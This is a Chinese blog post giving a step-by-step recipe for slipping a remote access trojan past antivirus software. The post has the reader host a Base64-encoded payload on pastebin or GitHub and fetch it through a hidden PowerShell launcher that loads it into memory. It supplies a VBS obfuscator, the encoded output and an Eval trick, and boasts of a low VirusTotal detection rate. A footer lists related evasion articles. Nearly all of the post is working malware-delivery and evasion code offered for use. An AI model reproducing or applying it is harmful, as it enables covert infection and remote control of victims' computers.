基于PowerShll的免杀思路,过国外主流杀毒

最新推荐文章于 2024-06-18 21:15:19 发布
最新推荐文章于 2024-06-18 21:15:19 发布
阅读量1.4k 收藏 4
点赞数 1
分类专栏: 心情杂货铺 文章标签: Powershell 无文件 vbs 免杀 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/92807628
版权

1) 首先准备一个你的RAT小马,可以是任何exe后缀的文件
2)使用工具将exe转换为Base64格式
3)将Base64字符串上传到pastebin.com,或者github,得到一个可访问的raw的地址

4)将得到的raw地址,替换下面ps代码中的URL,并将该文件保存为Inject to powershell.vbs

CreateObject("WScript.Shell").Run "PowerShell.exe -windowstyle hidden -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring(" & "'URL'))).EntryPoint.invoke($null,$null)"

5)将下面vbs代码保存为Simpl Crypt Method.vbs

Randomize
Set oARG=WScript.Arguments
Set oFSO=CreateObject("Scripting.FileSystemObject")
If oARG.Count=0 Then WScript.Quit
For Each File In oARG
	Set s=oFSO.OpenTextFile(File,1)
	Set o=oFSO.CreateTextFile(File& "_.vbs",True)
	o.WriteLine "Execute("& r(s.readall)& ")"
Next
Function r(x)
	for i=1 To Len(x)
		e=e& "chr("& f(asc(mid(x,i,1)))& ")& "
	next
	r=Left(e,Len(e)-2)
End Function
Function f(n)
	m=int(rnd*99)+1
	If n mod m=0 Then
		t=(n/m)& "*"& m
	Else
		u=int(rnd*1)
		If u=0 Then t=(n+m)& "-"& m
		
	End If
	f=t
End Function

6)将前面的Inject to powershell.vbs文件拖拽到Simpl Crypt Method.vbs文件上进行加密,得到加密后的文件Inject to powershell.vbs_.vbs

Execute(chr(77-64)& chr(84-74)& chr(145-78)& chr(177-63)& chr(194-93)& chr(183-86)& chr(142-26)& chr(120-19)& chr(154-75)& chr(161-63)& chr(171-65)& chr(153-52)& chr(118-19)& chr(202-86)& chr(86-46)& chr(123-89)& chr(159-72)& chr(174-91)& chr(178-79)& chr(151-37)& chr(179-74)& chr(7*16)& chr(158-42)& chr(106-60)& chr(132-49)& chr(167-63)& chr(128-27)& chr(188-80)& chr(129-21)& chr(112-78)& chr(131-90)& chr(108-62)& chr(121-39)& chr(131-14)& chr(170-60)& chr(87-55)& chr(56-22)& chr(118-38)& chr(170-59)& chr(180-61)& chr(110-9)& chr(118-4)& chr(138-55)& chr(197-93)& chr(112-11)& chr(202-94)& chr(9*12)& chr(136-90)& chr(148-47)& chr(174-54)& chr(152-51)& chr(75-43)& chr(49-4)& chr(186-67)& chr(114-9)& chr(195-85)& chr(50*2)& chr(205-94)& chr(133-14)& chr(171-56)& chr(58*2)& chr(182-61)& chr(204-96)& chr(119-18)& chr(91-59)& chr(133-29)& chr(113-8)& chr(124-24)& chr(188-88)& chr(129-28)& chr(171-61)& chr(8*4)& chr(118-73)& chr(125-15)& chr(167-56)& chr(171-70)& chr(152-32)& chr(137-32)& chr(159-43)& chr(91-59)& chr(179-88)& chr(151-86)& chr(155-43)& chr(175-63)& chr(82-14)& chr(129-18)& chr(126-17)& chr(143-46)& chr(180-75)& chr(135-25)& chr(142-49)& chr(111-53)& chr(143-85)& chr(81-14)& chr(209-92)& chr(177-63)& chr(163-49)& chr(148-47)& chr(131-21)& chr(154-38)& chr(88-20)& chr(208-97)& chr(186-77)& chr(167-70)& chr(151-46)& chr(203-93)& chr(72-26)& chr(115-39)& chr(130-19)& chr(170-73)& chr(50*2)& chr(102-62)& chr(175-84)& chr(114-47)& chr(192-81)& chr(11*10)& chr(123-5)& chr(110-9)& chr(184-70)& chr(140-24)& chr(113-20)& chr(144-86)& chr(108-50)& chr(110-40)& chr(121-7)& chr(149-38)& chr(150-41)& chr(122-24)& chr(103-6)& chr(146-31)& chr(168-67)& chr(65-11)& chr(94-42)& chr(165-82)& chr(180-64)& chr(123-9)& chr(176-71)& chr(55*2)& chr(176-73)& chr(137-97)& chr(102-62)& chr(130-52)& chr(199-98)& chr(216-97)& chr(53-8)& chr(169-90)& chr(108-10)& chr(116-10)& chr(135-34)& chr(142-43)& chr(184-68)& chr(121-89)& chr(110-27)& chr(217-96)& chr(164-49)& chr(133-17)& chr(116-15)& chr(197-88)& chr(139-93)& chr(126-48)& chr(114-13)& chr(175-59)& chr(100-54)& chr(156-69)& chr(175-74)& chr(195-97)& chr(116-49)& chr(147-39)& chr(149-44)& chr(198-97)& chr(11*10)& chr(142-26)& chr(74-33)& chr(125-79)& chr(97-29)& chr(176-65)& chr(214-95)& chr(138-28)& chr(27*4)& chr(140-29)& chr(142-45)& chr(122-22)& chr(177-62)& chr(186-70)& chr(211-97)& chr(194-89)& chr(122-12)& chr(149-46)& chr(138-98)& chr(104-70)& chr(91-59)& chr(46-8)& chr(51-19)& chr(123-89)& chr(93-54)& chr(108-23)& chr(137-55)& chr(93-17)& chr(41-2)& chr(63-22)& chr(120-79)& chr(47-6)& chr(53-7)& chr(116-47)& chr(202-92)& chr(169-53)& chr(138-24)& chr(130-9)& chr(149-69)& chr(154-43)& chr(118-13)& chr(139-29)& chr(129-13)& chr(144-98)& chr(188-83)& chr(204-94)& chr(121-3)& chr(144-33)& chr(153-46)& chr(106-5)& chr(83-43)& chr(131-95)& chr(173-63)& chr(143-26)& chr(6*18)& chr(201-93)& chr(80-36)& chr(126-90)& chr(148-38)& chr(195-78)& chr(134-26)& chr(108*1)& chr(119-78)& chr(114-80)& chr(23-10)& chr(105-95))

7)将生成的加密文件开头部分的Execute,改为C =

8) 在加密文件末尾追加以下vbs代码

Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace(&H26&)
Set objFolderItem = objFolder.Self
 KK= Mid(objFolderItem.Path,1,1)
n="Exe" & KK & "ute(C)"
Eval(n)

9)最终的加密文件demo

在这里插入图片描述

10) VT扫描结果,只有3家报毒
https://www.virustotal.com/gui/file/3f937f6721235bd23674672df26f5dee1fad62959fe8cd5f09c060d39a51e480/detection
在这里插入图片描述

FFE4
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红蓝对抗----免杀原理和绕过研究
SHELLCODE_8BIT的博客
09-25 892
前言(更新版) 世面上很多的杀软免杀文章,但经过笔者实战,发现一个问题,会有很多方法推荐给你,例如加壳,加花指令等等的方式。本来不会被查杀的程序,被加壳后还被查杀了。这对新手十分不友好。那么有没有一种实战性强(既免杀率高,免杀效果持久),一站式的免杀流程和方案来让你制作免杀。并且该免杀方案还能保持一些原则来增加程序的免杀持久性。答案是有。接下来我们将在该系列中介绍一种一站式免杀流程和方案,让新手更快的学会和应用。 在该系列文章中将静态免杀和动态免杀,划分方式为是否运行程序。主要分为以下两种情况: 1.
BK免杀论坛的养鸡场源码,非常稳定的一款养鸡场
02-08
BK免杀论坛的养鸡场源码,抓鸡杠杠的,免杀非常好做,替换资源就免杀杀毒网全部杀软,国内杀毒直接秒杀,上线稳定不掉,上线延迟非常低,很流畅。
MSF免杀
LainWith的博客
12-12 2954
MSF 参考: 远控免杀专题文章(2)-msfvenom隐藏的参数 远控免杀专题文章(3)-msf自免杀(VT免杀率35/69) msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。 参数 ![image.png](https://img
Shellcode详解
最新发布
N阶二进制的博客
06-18 1672
Shellcode是一种小巧、紧凑的机器代码,通常用于利用软件漏洞或注入攻击中。其名称来源于早期的黑客技术,其中的代码通常会启动一个命令行shell(如Bash或cmd),因此称为“shellcode”。不过,现在shellcode不仅仅用于启动shell,还可以执行各种恶意活动,如下载并执行恶意软件、修改系统设置等。
【渗透测试笔记】之【Python免杀——两行代码免杀VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)】
AA8j的博客
10-24 5645
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查杀率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离后shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查杀率:1
宏病毒(2)
WLINX
12-09 596
样本HASH:AB74EE2373229626FE368A83D98F2A47 扫下VT,可以看到有45家报毒了。 微步在线查一波,看下报告。 执行流程 现在来打开样本,日常宏警告。 这次用个工具,把宏弄出来。先用olevba看下大体情况。 +----------+--------------------+----------------------------...
Powershell免杀
mingyqf的博客
05-11 2435
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
我的powershell免杀之路
weixin_43939009的博客
07-11 1172
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用PowerShell来实现,近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下。 / 这次我将结合前人的各种骚操作,以及个人的不断试错,所想所思,来写一篇关于powershell来进行免杀,达到CS多种姿势绕过AV
使用PowerShell发送POST / GET请求
04-07
在Windows环境中,PowerShell提供了一种强大的命令行工具,可以实现这些功能。本教程将深入探讨如何使用PowerShell来发送POST和GET请求,以及相关的知识点。 1. **PowerShell基础知识**: PowerShell是一种面向...
PowerShell脚本反引号用法实例:随时随地给代码换行
09-21
在编写PowerShell脚本时,通常会遇到一个常见的问题——如何处理那些长度过长的代码行。根据编程规范和最佳实践,单行代码的字符数量最好控制在80个以内,这有助于提高代码的可读性和可维护性。因此,掌握如何在...
一款免杀远控,马子体积小
qq_26063781的博客
08-21 1900
一款免杀远控,马子体积小 大家可以用 下载地址:http://www.guokems.com/forum.php?mod=viewthread&tid=65&extra=
9月10号更新小七免杀论坛终结者V3.0源码.zip
09-24
9月10号更新小七免杀论坛终结者V3.0源码
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 740
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
免杀 | powershell免杀的几种简单方式
weixin_66717977的博客
03-13 572
免杀对抗 | powershell免杀 | 免杀技术
在阿一学习网络安全的第n天:免杀练习
Ayixy的博客
05-07 312
将生成的测试文件导入virtest。等杀毒软件对生成的文件进行扫描。使用十六进制编辑器打开恶意软件。因此被杀毒软件检测为病毒。保存后使其暴露在杀软环境下。可勾选自动确定,防止手酸。将该单词进行修改即可。
免杀powershell
zhangshuaiijie的博客
06-24 245
下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation。进入Invoke-Obfuscation目录,在powershell中执行。我看了好几篇去年的文章还是能过的,不过现在火狐和360都不能过去。不过在virscan和VirusTotal上面报毒还是很少的。如果报错,在管理员权限下powershell执行。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 743
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
VT上搜索恶意软件
wangtiankuo的博客
12-24 2727
VT上搜索恶意软件 恶意软件搜索是VT上的一个服务,它允许用户挂接VT上提交的文件流并且有文件匹配到用户编写的YARA规则时通知用户。如果你之前从未使用过YARA,我们建议你可以从阅读YARA文档开始熟悉他,你也可以访问YARA官网去访问其他的工具和资源。 将YARA规则应用于VT上的文件,你可以,得到一个通过病毒家族分类的恒定的恶意软件流,发现没有被反病毒引擎检测出的新的恶意软件,收集使用特定...
powershll 远程执行bash shell 脚本
06-02
是的,您可以使用 PowerShell 远程执行 Bash shell 脚本。以下是一个示例: ```powershell Invoke-Command -ComputerName remote_computer -ScriptBlock {bash /path/to/script.sh} ``` 在这个示例中,`remote_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值